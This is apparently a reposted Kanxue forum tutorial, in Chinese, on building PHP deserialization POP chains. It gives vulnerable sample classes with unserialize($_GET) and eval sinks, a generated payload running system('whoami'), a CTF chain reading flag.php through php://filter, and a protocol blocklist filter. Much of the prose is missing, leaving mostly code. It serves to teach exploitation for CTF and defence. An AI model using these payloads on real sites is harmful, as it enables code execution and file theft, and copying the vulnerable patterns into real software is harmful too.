POP链构造学习心得
本文为看雪论坛优秀文章
看雪论坛作者ID:H3h3QAQ
POP链基础
一
POP和POP链的定义
1、什么是POP
2、POP链原理
二
POP链构造初探
1、简单的POP链构造三部曲
show_source(__FILE__);
class Lemon {
protected $a;
function __construct() {
$this->a = new H3();
}
function __destruct() {
$this->a->action();
}
}
class H3 {
function action() {
echo "I want to play basketball!";
}
}
class Hack {
private $data;
function H3() {
eval($this->data);
}
}
unserialize($_GET['eval']);
__destruct()://析构函数当对象被销毁时会被自动调用
__wakeup(): //unserialize()时会被自动调用
__invoke(): //当尝试以调用函数的方法调用一个对象时,会被自动调用
__call(): //在对象上下文中调用不可访问的方法时触发
__callStatci(): //在静态上下文中调用不可访问的方法时触发
__get(): //用于从不可访问的属性读取数据
__set(): //用于将数据写入不可访问的属性
__isset(): //在不可访问的属性上调用isset()或empty()触发
__unset(): //在不可访问的属性上使用unset()时触发
__toString(): //把类当作字符串使用时触发
__construct(): //构造函数,当对象new的时候会自动调用,但在unserialize()时不会自动调用
__sleep(): //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用
class Lemon {
protected $a;
function __construct() {
$this->a = new H3();
}
function __destruct() {
$this->a->action();
}
}
class Hack {
private $data;
function action() {
eval($this->data);
}
}
class Lemon {
protected $a;
function __construct() {
$this->a = new Hack();
}
}
class Hack {
private $data="system('whoami');";
}
$a=new Lemon();
echo urlencode(serialize($a));
O%3A5%3A%22Lemon%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3BO%3A4%3A%22Hack%22%3A1%3A%7Bs%3A10%3A%22%00Hack%00data%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D
2、CTF题目中的POP链构造
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){ //当脚本尝试将对象调用为函数时触发
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){ // 当一个对象创建时被调用
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){ //当一个对象被当作一个字符串被调用
return $this->str->source;
}
public function __wakeup(){ //使用unserialize时触发
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){ // 当一个对象创建时被调用
$this->p = array();
}
public function __get($key){ //用于从不可访问的属性读取数据
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){ //当脚本尝试将对象调用为函数时触发
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){ // 当一个对象创建时被调用
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){ //当一个对象被当作一个字符串被调用
return $this->str->source;
}
public function __wakeup(){ //使用unserialize时触发
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
public function __wakeup(){ //使用unserialize时触发
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
public function __toString(){ //当一个对象被当作一个字符串被调用
return $this->str->source;
}
public function __get($key){ //用于从不可访问的属性读取数据
$function = $this->p;
return $function();
}
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){ //当脚本尝试将对象调用为函数时触发
$this->append($this->var);
}
}
class Modifier {
protected $var = "php://filter/convert.base64-encode/resource=flag.php";
}
class Show{
public $source;
public $str;
public function __construct($file){
$this->source = $file;
}
public function __toString(){
return "H3";
}
}
class Test{
public $p;
public function __construct(){
$this->p = new Modifier();
}
}
$a = new Show(' ');
$a->str= new Test();
$h3 = new Show($a);
echo urlencode(serialize($h3));
3、真实环境下的POP链构造
三
总结
看雪ID:H3h3QAQ
https://bbs.kanxue.com/user-home-921448.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注KnowSafe微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接